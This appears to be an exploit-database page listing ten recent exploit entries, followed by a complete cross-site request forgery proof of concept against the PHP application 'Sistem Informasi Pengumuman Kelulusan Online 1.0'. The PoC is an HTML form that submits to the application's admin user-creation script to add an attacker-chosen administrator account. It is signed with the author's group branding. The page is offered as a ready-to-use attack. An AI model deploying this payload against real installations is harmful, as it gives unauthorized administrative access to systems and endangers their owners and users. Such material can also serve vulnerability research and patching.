6ec646f7e1
10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
40 lines
No EOL
1.2 KiB
Text
40 lines
No EOL
1.2 KiB
Text
# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
|
|
# Google Dork: N/A
|
|
# Date: 2020-06-10
|
|
# Exploit Author: Extinction
|
|
# Vendor Homepage: https://adikiss.net/
|
|
# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/
|
|
# Version: latest
|
|
# Tested on: Linux,windows,macOS
|
|
|
|
# Description SpearSecurity :
|
|
# CSRF vulnerability was discovered in Sistem kelulusan.
|
|
# With this vulnerability, authorized users can be added to the system.
|
|
|
|
POC:
|
|
|
|
<html>
|
|
<body>
|
|
<center>
|
|
<hr>
|
|
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
|
|
<input type="text" class="form-control" name="nama"
|
|
placeholder="Username" size="35">
|
|
<br>
|
|
<input type="text" class="form-control" name="username"
|
|
placeholder="Spear" size="35">
|
|
<br>
|
|
<input type="text" class="form-control" name="pass"
|
|
placeholder="Security" size="35">
|
|
<br>
|
|
<br>
|
|
<input type="submit" name="submit" id="submit" value="Simpan Data"
|
|
class="btn btn-primary" onclick="tb_remove()">
|
|
</form>
|
|
<hr>
|
|
<h1> CODED BY SPEAR-SECURITY </h1>
|
|
<h2> Author Extinction </h2>
|
|
</body>
|
|
</html>
|
|
|
|
#SpearSecurity-ID |